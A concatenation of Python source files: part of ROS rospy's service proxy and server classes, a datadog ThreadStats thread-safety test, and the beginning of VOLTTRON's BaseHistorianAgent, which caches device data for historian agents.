@param persistent: (optional) if True, proxy maintains a persistent
connection to service. While this results in better call
performance, persistent connections are discouraged as they are
less resistant to network issues and service restarts.
@type persistent: bool
@param headers: (optional) arbitrary headers
@type headers: dict
"""
super(ServiceProxy, self).__init__(name, service_class)
self.uri = None
self.seq = 0
self.buff_size = DEFAULT_BUFF_SIZE
self.persistent = persistent
if persistent:
if not headers:
headers = {}
headers['persistent'] = '1'
self.protocol = TCPROSServiceClient(self.resolved_name,
self.service_class, headers=headers)
self.transport = None #for saving persistent connections
def wait_for_service(self, timeout=None):
wait_for_service(self.resolved_name, timeout=timeout)
# #425
def __call__(self, *args, **kwds):
"""
Callable-style version of the service API. This accepts either a request message instance,
or you can call directly with arguments to create a new request instance. e.g.::
add_two_ints(AddTwoIntsRequest(1, 2))
add_two_ints(1, 2)
add_two_ints(a=1, b=2)
@param args: arguments to remote service
@param kwds: message keyword arguments
@raise ROSSerializationException: If unable to serialize
message. This is usually a type error with one of the fields.
"""
return self.call(*args, **kwds)
def _get_service_uri(self, request):
"""
private routine for getting URI of service to call
@param request: request message
@type request: L{rospy.Message}
"""
if not isinstance(request, genpy.Message):
raise TypeError("request object is not a valid request message instance")
# in order to support more interesting overrides, we only
# check that it declares the same ROS type instead of a
# stricter class check
#if not self.request_class == request.__class__:
if not self.request_class._type == request._type:
raise TypeError("request object type [%s] does not match service type [%s]"%(request.__class__, self.request_class))
#TODO: subscribe to service changes
#if self.uri is None:
if 1: #always do lookup for now, in the future we need to optimize
try:
try:
master = rosgraph.Master(rospy.names.get_caller_id())
self.uri = master.lookupService(self.resolved_name)
except socket.error:
raise ServiceException("unable to contact master")
except rosgraph.MasterError as e:
logger.error("[%s]: lookup service failed with message [%s]", self.resolved_name, str(e))
raise ServiceException("service [%s] unavailable"%self.resolved_name)
# validate
try:
rospy.core.parse_rosrpc_uri(self.uri)
except rospy.impl.validators.ParameterInvalid:
raise ServiceException("master returned invalid ROSRPC URI: %s"%self.uri)
except socket.error as e:
logger.error("[%s]: socket error contacting service, master is probably unavailable",self.resolved_name)
return self.uri
def call(self, *args, **kwds):
"""
Call the service. This accepts either a request message instance,
or you can call directly with arguments to create a new request instance. e.g.::
add_two_ints(AddTwoIntsRequest(1, 2))
add_two_ints(1, 2)
add_two_ints(a=1, b=2)
@raise TypeError: if request is not of the valid type (Message)
@raise ServiceException: if communication with remote service fails
@raise ROSInterruptException: if node shutdown (e.g. ctrl-C) interrupts service call
@raise ROSSerializationException: If unable to serialize
message. This is usually a type error with one of the fields.
"""
# convert args/kwds to request message class
request = rospy.msg.args_kwds_to_message(self.request_class, args, kwds)
# initialize transport
if self.transport is None:
service_uri = self._get_service_uri(request)
dest_addr, dest_port = rospy.core.parse_rosrpc_uri(service_uri)
# connect to service
transport = TCPROSTransport(self.protocol, self.resolved_name)
transport.buff_size = self.buff_size
try:
transport.connect(dest_addr, dest_port, service_uri)
except TransportInitError as e:
# can be a connection or md5sum mismatch
raise ServiceException("unable to connect to service: %s"%e)
self.transport = transport
else:
transport = self.transport
# send the actual request message
self.seq += 1
transport.send_message(request, self.seq)
try:
responses = transport.receive_once()
if len(responses) == 0:
raise ServiceException("service [%s] returned no response"%self.resolved_name)
elif len(responses) > 1:
raise ServiceException("service [%s] returned multiple responses: %s"%(self.resolved_name, len(responses)))
except rospy.exceptions.TransportException as e:
# convert lower-level exception to exposed type
if rospy.core.is_shutdown():
raise rospy.exceptions.ROSInterruptException("node shutdown interrupted service call")
else:
raise ServiceException("transport error completing service call: %s"%(str(e)))
finally:
if not self.persistent:
transport.close()
self.transport = None
return responses[0]
def close(self):
"""Close this ServiceProxy. This only has an effect on persistent ServiceProxy instances."""
if self.transport is not None:
self.transport.close()
class ServiceImpl(_Service):
"""
Implementation of ROS Service. This intermediary class allows for more configuration of behavior than the Service class.
"""
def __init__(self, name, service_class, handler, buff_size=DEFAULT_BUFF_SIZE):
super(ServiceImpl, self).__init__(name, service_class)
if not name or not isstring(name):
raise ValueError("service name is not a non-empty string")
# #2202
if not rosgraph.names.is_legal_name(name):
import warnings
warnings.warn("'%s' is not a legal ROS graph resource name. This may cause problems with other ROS tools"%name, stacklevel=2)
self.handler = handler
self.registered = False
self.seq = 0
self.done = False
self.buff_size=buff_size
start_tcpros_server() #lazy-init the tcprosserver
host, port = get_tcpros_server_address()
self.uri = '%s%s:%s'%(rospy.core.ROSRPC, host, port)
logdebug("... service URL is %s"%self.uri)
self.protocol = TCPService(self.resolved_name, service_class, self.buff_size)
logdebug("[%s]: new Service instance"%self.resolved_name)
# TODO: should consider renaming to unregister
def shutdown(self, reason=''):
"""
Stop this service
@param reason: human-readable shutdown reason
@type reason: str
"""
self.done = True
logdebug('[%s].shutdown: reason [%s]'%(self.resolved_name, reason))
try:
#TODO: make service manager configurable
get_service_manager().unregister(self.resolved_name, self)
except Exception as e:
logerr("Unable to unregister with master: "+traceback.format_exc())
raise ServiceException("Unable to connect to master: %s"%e)
def spin(self):
"""
Let service run and take over thread until service or node
shutdown. Use this method to keep your scripts from exiting
execution.
"""
try:
while not rospy.core.is_shutdown() and not self.done:
time.sleep(0.5)
except KeyboardInterrupt:
logdebug("keyboard interrupt, shutting down")
def _write_service_error(self, transport, err_msg):
"""
Send error message to client
@param transport: transport connection to client
@type transport: Transport
@param err_msg: error message to send to client
@type err_msg: str
"""
transport.write_data(struct.pack('<BI%ss'%len(err_msg), 0, len(err_msg), err_msg))
def _handle_request(self, transport, request):
"""
Process a single incoming request.
@param transport: transport instance
@type transport: L{TCPROSTransport}
@param request: Message
@type request: genpy.Message
"""
try:
# convert return type to response Message instance
response = convert_return_to_response(self.handler(request), self.response_class)
self.seq += 1
# ok byte
transport.write_buff.write(struct.pack('<B', 1))
transport.send_message(response, self.seq)
except ServiceException as e:
rospy.core.rospydebug("handler raised ServiceException: %s"%(e))
self._write_service_error(transport, "service cannot process request: %s"%e)
except Exception as e:
logerr("Error processing request: %s\n%s"%(e,traceback.print_exc()))
self._write_service_error(transport, "error processing request: %s"%e)
def handle(self, transport, header):
"""
Process incoming request. This method should be run in its
own thread. If header['persistent'] is set to 1, method will
block until connection is broken.
@param transport: transport instance
@type transport: L{TCPROSTransport}
@param header: headers from client
@type header: dict
"""
if 'persistent' in header and \
header['persistent'].lower() in ['1', 'true']:
persistent = True
else:
persistent = False
if header.get('probe', None) == '1':
#this will likely do more in the future
transport.close()
return
handle_done = False
while not handle_done:
try:
requests = transport.receive_once()
for request in requests:
self._handle_request(transport, request)
if not persistent:
handle_done = True
except rospy.exceptions.TransportTerminated as e:
if not persistent:
logerr("incoming connection failed: %s"%e)
logdebug("service[%s]: transport terminated"%self.resolved_name)
handle_done = True
transport.close()
class Service(ServiceImpl):
"""
Declare a ROS service. Service requests are passed to the
specified handler.
Service Usage::
s = Service('getmapservice', GetMap, get_map_handler)
"""
def __init__(self, name, service_class, handler, buff_size=DEFAULT_BUFF_SIZE):
"""
ctor.
@param name: service name, ``str``
@param service_class: Service definition class
@param handler: callback function for processing service
request. Function takes in a ServiceRequest and returns a
ServiceResponse of the appropriate type. Function may also
return a list, tuple, or dictionary with arguments to initialize
a ServiceResponse instance of the correct type.
If handler cannot process request, it may either return None,
to indicate failure, or it may raise a rospy.ServiceException
to send a specific error message to the client. Returning None
is always considered a failure.
@type handler: fn(req)->resp
@param buff_size: size of buffer for reading incoming requests. Should be at least size of request message
@type buff_size: int
"""
super(Service, self).__init__(name, service_class, handler, buff_size)
#TODO: make service manager configurable
get_service_manager().register(self.resolved_name, self)
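# Illustrative handler sketch (not part of the original module; AddTwoInts and its request
# fields are placeholders): the handler receives the request message and may return a
# response instance, a dict, a tuple, or a bare value (see convert_return_to_response);
# raising rospy.ServiceException reports a specific error to the client, and returning
# None marks the call as failed.
#
#   def handle_add_two_ints(req):
#       return req.a + req.b   # bare value, wrapped into the response message
#
#   s = Service('add_two_ints', AddTwoInts, handle_add_two_ints)
#   s.spin()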
|
test_threadstats_thread_safety.py
|
import re
import time
import threading
from datadog import ThreadStats
class MemoryReporter(object):
""" A reporting class that reports to memory for testing. """
def __init__(self):
self.metrics = []
self.events = []
def flush_metrics(self, metrics):
self.metrics += metrics
def flush_events(self, events):
self.events += events
class ThreadStatsTest(ThreadStats):
def send_metrics_and_event(self, id):
# Counter
self.increment("counter", timestamp=12345)
time.sleep(0.001) # sleep makes the os continue another thread
# Gauge
self.gauge("gauge_" + str(id), 42)
time.sleep(0.001) # sleep makes the os continue another thread
# Histogram
self.histogram("histogram", id, timestamp=12345)
time.sleep(0.001) # sleep makes the os continue another thread
# Event
self.event("title", "content")
class TestThreadStatsThreadSafety(object):
def test_threadstats_thread_safety(self):
stats = ThreadStatsTest()
stats.start(roll_up_interval=10, flush_in_thread=False)
reporter = stats.reporter = MemoryReporter()
for i in range(10000):
threading.Thread(target=stats.send_metrics_and_event, args=[i]).start()
# Wait all threads to finish
time.sleep(10)
# Flush and check
stats.flush()
metrics = reporter.metrics
events = reporter.events
# Overview
assert len(metrics) == 10009
# Sort metrics
counter_metrics = []
gauge_metrics = []
histogram_metrics = []
for m in metrics:
if re.match("gauge_.*", m['metric']):
gauge_metrics.append(m)
elif re.match("histogram.*", m['metric']):
histogram_metrics.append(m)
else:
counter_metrics.append(m)
# Counter
assert len(counter_metrics) == 1
counter = counter_metrics[0]
assert counter['points'][0][1] == 10000
# Gauge
assert len(gauge_metrics) == 10000
# Histogram
assert len(histogram_metrics) == 8
count_histogram = [m for m in histogram_metrics if m['metric'] == "histogram.count"][0]
assert count_histogram['points'][0][1] == 10000
avg_histogram = [m for m in histogram_metrics if m['metric'] == "histogram.avg"][0]
assert avg_histogram['points'][0][1] == 4999.5
# Events
assert 10000 == len(events)
|
base_historian.py
|
# -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
# Copyright (c) 2015, Battelle Memorial Institute
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation
# are those of the authors and should not be interpreted as representing
# official policies, either expressed or implied, of the FreeBSD
# Project.
#
# This material was prepared as an account of work sponsored by an
# agency of the United States Government. Neither the United States
# Government nor the United States Department of Energy, nor Battelle,
# nor any of their employees, nor any jurisdiction or organization that
# has cooperated in the development of these materials, makes any
# warranty, express or implied, or assumes any legal liability or
# responsibility for the accuracy, completeness, or usefulness or any
# information, apparatus, product, software, or process disclosed, or
# represents that its use would not infringe privately owned rights.
#
# Reference herein to any specific commercial product, process, or
# service by trade name, trademark, manufacturer, or otherwise does not
# necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors
# expressed herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY
# operated by BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
"""
=====================
Historian Development
=====================
Support for storing and retrieving historical device and analysis data
published to the message bus is handled with Historian Agents. If a new type
of data store or a new way of storing data is desired, a new type of Historian
Agent should be created.
Historian Agents are implemented by subclassing :py:class:`BaseHistorian`.
Agents that need short term storage of device data should subscribe to device
data and use internal data structures for storage. Agents which need long
term Historical data that predates the startup of the Agent should interact
with a Historian Agent in order to obtain that data as needed.
While it is possible to create an Agent from scratch which handles gathering
and storing device data, it will miss out on the benefits of a proper
Historian Agent created by subclassing :py:class:`BaseHistorian`. The
:py:class:`BaseHistorian` class provides the following features:
- A separate thread for all communication with a data store removing the need
to use or implement special libraries to work with gevent.
- Automatically subscribe to and process device publishes.
- Automatically backup data retrieved off the message bus to a disk cache.
Cached data will only be removed once it is successfully published to a data
store.
- Existing Agents that publish analytical data for storage or query for
historical data will be able to use the new Historian without any code
changes.
- Data can be graphed in VOLTTRON Central.
Creating a New Historian
------------------------
To create a new Historian, create a new Agent that subclasses
:py:class:`BaseHistorian`. :py:class:`BaseHistorian` inherits from
:py:class:`volttron.platform.vip.agent.Agent` so including it in the class
parents is not needed.
The new Agent must implement the following methods:
- :py:meth:`BaseHistorianAgent.publish_to_historian`
- :py:meth:`BaseQueryHistorianAgent.query_topic_list`
- :py:meth:`BaseQueryHistorianAgent.query_historian`
While not required, this method may be overridden as needed:
- :py:meth:`BaseHistorianAgent.historian_setup`
Optionally a Historian Agent can inherit from :py:class:`BaseHistorianAgent`
instead of :py:class:`BaseHistorian` if support for querying data is not
needed for the data store. If this route is taken, VOLTTRON Central
will not be able to graph data from the store. It is possible to run more than
one Historian agent at a time to store data in more than one place. If needed,
one can be used to allow querying while another puts data into the
desired store that does not allow querying.
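A minimal sketch of such an Agent is shown below. The ``ExampleStore`` client
and its method names are illustrative assumptions only; they are not part of
VOLTTRON or of this module:
.. code-block:: python

    class SketchHistorian(BaseHistorian):
        # Minimal sketch of a Historian backed by a hypothetical store.
        def historian_setup(self):
            # Runs in the publishing thread before the main loop starts.
            self._store = ExampleStore('example.db')  # hypothetical client
        def publish_to_historian(self, to_publish_list):
            for record in to_publish_list:
                # hypothetical store call; see "Storing Data" below
                self._store.insert(record['topic'], record['timestamp'],
                                   record['value'], record['meta'])
                self.report_handled(record)
        def query_topic_list(self):
            return self._store.topics()  # hypothetical call
        def query_historian(self, topic, start=None, end=None, skip=0,
                            count=None, order=None):
            # hypothetical call returning [(timestamp string, value), ...]
            values = self._store.query(topic, start, end, skip, count, order)
            return {'values': values, 'metadata': {}}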
Historian Execution Flow
------------------------
At startup the :py:class:`BaseHistorian` class starts a new thread to handle
all data caching and publishing (the publishing thread). The main thread then
subscribes to all Historian related topics on the message bus. Whenever
subscribed data comes in, it is published to a Queue to be processed by the
publishing thread as soon as possible.
At startup the publishing thread calls
:py:meth:`BaseHistorianAgent.historian_setup` to give the implemented
Historian a chance to setup any connections in the thread.
The publishing thread then enters the following logic loop:
::
Wait for data to appear in the Queue. Proceed if data appears or a
`retry_period` time elapses.
If new data appeared in Queue:
Save new data to cache.
While data is in cache:
Publish data to store by calling
:py:meth:`BaseHistorianAgent.publish_to_historian`.
If no data was published:
Go back to start and check Queue for data.
Remove published data from cache.
If we have been publishing for `max_time_publishing`:
Go back to start and check Queue for data.
The logic will also forgo waiting the `retry_period` for new data to appear
when checking for new data if publishing has been successful and there is
still data in the cache to be published.
Storing Data
------------
The :py:class:`BaseHistorian` will call
:py:meth:`BaseHistorianAgent.publish_to_historian` as the time series data
becomes available. Data is batched in groups of up to `submit_size_limit` records.
After processing the list or individual items in the list
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` to report that an individual point
of data was published or :py:meth:`BaseHistorianAgent.report_all_handled` to
report that everything from the batch was successfully published. This tells
the :py:class:`BaseHistorianAgent` class what to remove from the cache and if
any publishing was successful.
The `to_publish_list` argument of
:py:meth:`BaseHistorianAgent.publish_to_historian` is a list of records that
takes the following form:
.. code-block:: python
[
{
'_id': 1,
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'_id': 2,
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
As records are published to the data store
:py:meth:`BaseHistorianAgent.publish_to_historian` must call
:py:meth:`BaseHistorianAgent.report_handled` with the record or list of
records that were published, or :py:meth:`BaseHistorianAgent.report_all_handled`
if everything was published.
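The sketch below illustrates that contract; ``_insert_record`` is a
hypothetical per-record store call that may fail for individual records,
while the reporting methods come from the base class:
.. code-block:: python

    def publish_to_historian(self, to_publish_list):
        for record in to_publish_list:
            try:
                self._insert_record(record)  # hypothetical store call
            except Exception:
                # Leave the record in the cache; it will be retried later.
                continue
            self.report_handled(record)
        # If the whole batch is known to have succeeded, a single call to
        # self.report_all_handled() could replace the per-record reporting.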
Querying Data
-------------
When a request is made to query data, the
:py:meth:`BaseQueryHistorianAgent.query_historian` method is called.
When a request is made for the list of topics in the store
:py:meth:`BaseQueryHistorianAgent.query_topic_list`
will be called.
Other Notes
-----------
Implemented Historians must be tolerant of receiving the same data for
submission twice. While very rare, it is possible for a Historian to be
forcibly shutdown after data is published but before it is removed from the
cache. When restarted, the :py:class:`BaseHistorian` will submit
the same data over again.
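A common way to tolerate such duplicates is to upsert against a unique key,
much as the backup cache itself does with its ``UNIQUE(ts, topic_id, source)``
constraint. A minimal sketch, assuming an SQLite-backed store whose ``data``
table carries a ``UNIQUE(ts, topic)`` constraint (the table and cursor are
illustrative, not part of this module):
.. code-block:: python

    cursor.execute(
        '''INSERT OR REPLACE INTO data (ts, topic, value_string)
           VALUES (?, ?, ?)''',
        (record['timestamp'], record['topic'],
         jsonapi.dumps(record['value'])))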
"""
from __future__ import absolute_import, print_function
from abc import abstractmethod
from dateutil.parser import parse
import logging
import re
import sqlite3
from Queue import Queue, Empty
from collections import defaultdict
from datetime import datetime, timedelta
import threading
from threading import Thread
import weakref
import pytz
from zmq.utils import jsonapi
from volttron.platform.agent.utils import process_timestamp, \
fix_sqlite3_datetime, get_aware_utc_now
from volttron.platform.messaging import topics, headers as headers_mod
from volttron.platform.vip.agent import *
from volttron.platform.vip.agent import compat
_log = logging.getLogger(__name__)
ACTUATOR_TOPIC_PREFIX_PARTS = len(topics.ACTUATOR_VALUE.split('/'))
ALL_REX = re.compile('.*/all$')
# Register a better datetime parser in sqlite3.
fix_sqlite3_datetime()
class BaseHistorianAgent(Agent):
"""This is the base agent for historian Agents.
It automatically subscribes to all device publish topics.
Event processing occurs in its own thread so as not to block the main
thread. Both the historian_setup and publish_to_historian happen in
the same thread.
By default the base historian will listen to 4 separate root topics
(datalogger/*, record/*, actuators/*, and device/*). Messages that are
published to actuator are assumed to be part of the actuation process.
Messages published to datalogger will be assumed to be timepoint data that
is composed of units and specific types with the assumption that they have
the ability to be graphed easily. Messages published to devices
are data that comes directly from drivers. Finally, messages that are
published to record will be handled as string data and can be customized
to the user's specific situation.
This base historian will cache all received messages to a local database
before publishing them to the historian. This allows recovery from
unexpected failures that occur before data is successfully written to the
historian.
"""
def __init__(self,
retry_period=300.0,
submit_size_limit=1000,
max_time_publishing=30,
backup_storage_limit_gb=None,
topic_replace_list=None,
**kwargs):
super(BaseHistorianAgent, self).__init__(**kwargs)
# This should be a list of dictionaries with 'from' and 'to' keys whose
# values are replaced within topics before they are stored in the
# cache database.
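# For example (illustrative values only):
# topic_replace_list = [{'from': 'PNNL/BUILDING_1', 'to': 'campus/building1'}]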
self._topic_replace_list = topic_replace_list
_log.info('Topic string replace list: {}'
.format(self._topic_replace_list))
self._backup_storage_limit_gb = backup_storage_limit_gb
self._started = False
self._retry_period = retry_period
self._submit_size_limit = submit_size_limit
self._max_time_publishing = timedelta(seconds=max_time_publishing)
self._successful_published = set()
self._topic_replace_map = {}
self._event_queue = Queue()
self._process_thread = Thread(target=self._process_loop)
self._process_thread.daemon = True # Don't wait on thread to exit.
self._process_thread.start()
def _create_subscriptions(self):
subscriptions = [
(topics.DRIVER_TOPIC_BASE, self._capture_device_data),
(topics.LOGGER_BASE, self._capture_log_data),
(topics.ACTUATOR, self._capture_actuator_data),
(topics.ANALYSIS_TOPIC_BASE, self._capture_analysis_data),
(topics.RECORD, self._capture_record_data)
]
for prefix, cb in subscriptions:
_log.debug("subscribing to {}".format(prefix))
self.vip.pubsub.subscribe(peer='pubsub',
prefix=prefix,
callback=cb)
@Core.receiver("onstart")
def starting_base(self, sender, **kwargs):
"""
Subscribes to the platform message bus on the actuator, record,
datalogger, and device topics to capture data.
"""
_log.debug("Starting base historian")
self._create_subscriptions()
self._started = True
self.vip.heartbeat.start()
@Core.receiver("onstop")
def stopping(self, sender, **kwargs):
"""
Release subscription to the message bus because we are no longer able
to respond to messages now.
"""
try:
# unsubscribes to all topics that we are subscribed to.
self.vip.pubsub.unsubscribe(peer='pubsub', prefix=None,
callback=None)
except KeyError:
# means that the agent didn't start up properly so the pubsub
# subscriptions never got finished.
pass
def _get_topic(self, input_topic):
output_topic = input_topic
# Only if we have some topics to replace.
if self._topic_replace_list:
# if we have already cached the topic then return it.
if input_topic in self._topic_replace_map.keys():
output_topic = self._topic_replace_map[input_topic]
else:
self._topic_replace_map[input_topic] = input_topic
temptopics = {}
for x in self._topic_replace_list:
if x['from'] in input_topic:
# this allows multiple things to be replaced
# within a given topic.
new_topic = temptopics.get(input_topic, input_topic)
temptopics[input_topic] = new_topic.replace(
x['from'], x['to'])
for k, v in temptopics.items():
self._topic_replace_map[k] = v
output_topic = self._topic_replace_map[input_topic]
return output_topic
def _capture_record_data(self, peer, sender, bus, topic, headers,
message):
_log.debug('Capture record data {}'.format(message))
# Anon the topic if necessary.
topic = self._get_topic(topic)
timestamp_string = headers.get(headers_mod.DATE, None)
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
if sender == 'pubsub.compat':
message = compat.unpack_legacy_message(headers, message)
self._event_queue.put(
{'source': 'record',
'topic': topic,
'readings': [(timestamp, message)],
'meta': {}})
def _capture_log_data(self, peer, sender, bus, topic, headers, message):
"""Capture log data and submit it to be published by a historian."""
# Anon the topic if necessary.
topic = self._get_topic(topic)
try:
# 2.0 agents compatibility layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
data = compat.unpack_legacy_message(headers, message)
else:
data = message
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
source = 'log'
_log.debug(
"Queuing {topic} from {source} for publish".format(topic=topic,
source=source))
for point, item in data.iteritems():
# ts_path = location + '/' + point
if 'Readings' not in item or 'Units' not in item:
_log.error("logging request for {topic} missing Readings "
"or Units".format(topic=topic))
continue
units = item['Units']
dtype = item.get('data_type', 'float')
tz = item.get('tz', None)
if dtype == 'double':
dtype = 'float'
meta = {'units': units, 'type': dtype}
readings = item['Readings']
if not isinstance(readings, list):
readings = [(get_aware_utc_now(), readings)]
elif isinstance(readings[0], str):
my_ts, my_tz = process_timestamp(readings[0], topic)
readings = [(my_ts, readings[1])]
if tz:
meta['tz'] = tz
elif my_tz:
meta['tz'] = my_tz
self._event_queue.put({'source': source,
'topic': topic + '/' + point,
'readings': readings,
'meta': meta})
def _capture_device_data(self, peer, sender, bus, topic, headers,
message):
"""Capture device data and submit it to be published by a historian.
Filter out only the */all topics for publishing to the historian.
"""
if not ALL_REX.match(topic):
_log.debug("Unmatched topic: {}".format(topic))
return
# Anon the topic if necessary.
topic = self._get_topic(topic)
# Because of the above if we know that all is in the topic so
# we strip it off to get the base device
parts = topic.split('/')
device = '/'.join(parts[1:-1]) # '/'.join(reversed(parts[2:]))
_log.debug("found topic {}".format(topic))
self._capture_data(peer, sender, bus, topic, headers, message, device)
def _capture_analysis_data(self, peer, sender, bus, topic, headers,
message):
"""Capture analaysis data and submit it to be published by a historian.
Filter out all but the all topics
"""
# Anon the topic.
topic = self._get_topic(topic)
# topic now is going to always end in all.
if not topic.endswith('/'):
topic += '/'
if not topic.endswith('all'):
topic += 'all'
parts = topic.split('/')
# strip off the first part of the topic.
device = '/'.join(parts[1:-1])
self._capture_data(peer, sender, bus, topic, headers, message, device)
def _capture_data(self, peer, sender, bus, topic, headers, message,
device):
# Anon the topic if necessary.
topic = self._get_topic(topic)
timestamp_string = headers.get(headers_mod.DATE, None)
timestamp = get_aware_utc_now()
if timestamp_string is not None:
timestamp, my_tz = process_timestamp(timestamp_string, topic)
try:
_log.debug(
"### In capture_data Actual message {} ".format(message))
# 2.0 agents compatibility layer makes sender == pubsub.compat so
# we can do the proper thing when it is here
if sender == 'pubsub.compat':
# message = jsonapi.loads(message[0])
message = compat.unpack_legacy_message(headers, message)
if isinstance(message, dict):
values = message
else:
values = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
except Exception as e:
_log.exception(e)
return
meta = {}
if not isinstance(message, dict):
meta = message[1]
if topic.startswith('analysis'):
source = 'analysis'
else:
source = 'scrape'
_log.debug(
"Queuing {topic} from {source} for publish".format(topic=topic,
source=source))
for key, value in values.iteritems():
point_topic = device + '/' + key
self._event_queue.put({'source': source,
'topic': point_topic,
'readings': [(timestamp, value)],
'meta': meta.get(key, {})})
def _capture_actuator_data(self, topic, headers, message, match):
"""Capture actuation data and submit it to be published by a historian.
"""
# Anon the topic if necessary.
topic = self._get_topic(topic)
timestamp_string = headers.get('time')
if timestamp_string is None:
_log.error(
"message for {topic} missing timetamp".format(topic=topic))
return
try:
timestamp = parse(timestamp_string)
except (ValueError, TypeError) as e:
_log.error("message for {} bad timetamp string: "
"{}".format(topic, timestamp_string))
return
parts = topic.split('/')
topic = '/'.join(parts[ACTUATOR_TOPIC_PREFIX_PARTS:])
try:
value = message[0]
except ValueError as e:
_log.error("message for {topic} bad message string: "
"{message_string}".format(topic=topic,
message_string=message[0]))
return
except IndexError as e:
_log.error("message for {topic} missing message string".format(
topic=topic))
return
source = 'actuator'
_log.debug(
"Queuing {topic} from {source} for publish".format(topic=topic,
source=source))
self._event_queue.put({'source': source,
'topic': topic,
'readings': [(timestamp, value)],
'meta': {}})
def _process_loop(self):
"""
The process loop is called off of the main thread and will not exit
unless the main agent is shut down.
"""
_log.debug("Starting process loop.")
backupdb = BackupDatabase(self, self._backup_storage_limit_gb)
# Sets up the concrete historian
self.historian_setup()
# now that everything is setup we need to make sure that the topics
# are synchronized between
# Based on the state of the back log and whether or not successful
# publishing is currently happening (and how long it's taking)
# we may or may not want to wait on the event queue for more input
# before proceeding with the rest of the loop.
wait_for_input = not bool(
backupdb.get_outstanding_to_publish(self._submit_size_limit))
while True:
try:
_log.debug("Reading from/waiting for queue.")
new_to_publish = [
self._event_queue.get(wait_for_input, self._retry_period)]
except Empty:
_log.debug("Queue wait timed out. Falling out.")
new_to_publish = []
if new_to_publish:
_log.debug("Checking for queue build up.")
while True:
try:
new_to_publish.append(self._event_queue.get_nowait())
except Empty:
break
backupdb.backup_new_data(new_to_publish)
wait_for_input = True
start_time = datetime.utcnow()
_log.debug("Calling publish_to_historian.")
while True:
to_publish_list = backupdb.get_outstanding_to_publish(
self._submit_size_limit)
if not to_publish_list or not self._started:
break
try:
self.publish_to_historian(to_publish_list)
except Exception as exp:
_log.exception(
"An unhandled exception occured while publishing.")
# if the successful queue is empty then we need not remove
# them from the database.
if not self._successful_published:
break
backupdb.remove_successfully_published(
self._successful_published, self._submit_size_limit)
self._successful_published = set()
now = datetime.utcnow()
if now - start_time > self._max_time_publishing:
wait_for_input = False
break
_log.debug("Finished processing")
def report_handled(self, record):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian` to report that a record or
list of records has been successfully published and should be removed from the cache.
:param record: Record or list of records to remove from cache.
:type record: dict or list
"""
if isinstance(record, list):
for x in record:
self._successful_published.add(x['_id'])
else:
self._successful_published.add(record['_id'])
def report_all_handled(self):
"""
Call this from :py:meth:`BaseHistorianAgent.publish_to_historian` to report that all records
passed to :py:meth:`BaseHistorianAgent.publish_to_historian` have been successfully published
and should be removed from the cache.
"""
self._successful_published.add(None)
@abstractmethod
def publish_to_historian(self, to_publish_list):
"""
Main publishing method for historian Agents.
:param to_publish_list: List of records
:type to_publish_list: list
to_publish_list takes the following form:
.. code-block:: python
[
{
'_id': 1,
'timestamp': timestamp1.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/thermostat",
'value': 73.0,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
{
'_id': 2,
'timestamp': timestamp2.replace(tzinfo=pytz.UTC),
'source': 'scrape',
'topic': "pnnl/isb1/hvac1/temperature",
'value': 74.1,
'meta': {"units": "F", "tz": "UTC", "type": "float"}
},
...
]
The contents of `meta` are not guaranteed to be consistent. The keys and values of the
metadata may differ between records and may change over time. It is safe to assume that
the most recent values of the `meta` dictionary are the only ones that are relevant.
This is the way the cache treats metadata.
Once one or more records are published, either :py:meth:`BaseHistorianAgent.report_handled` or
:py:meth:`BaseHistorianAgent.report_all_handled` must be called to report records as being published.
"""
def historian_setup(self):
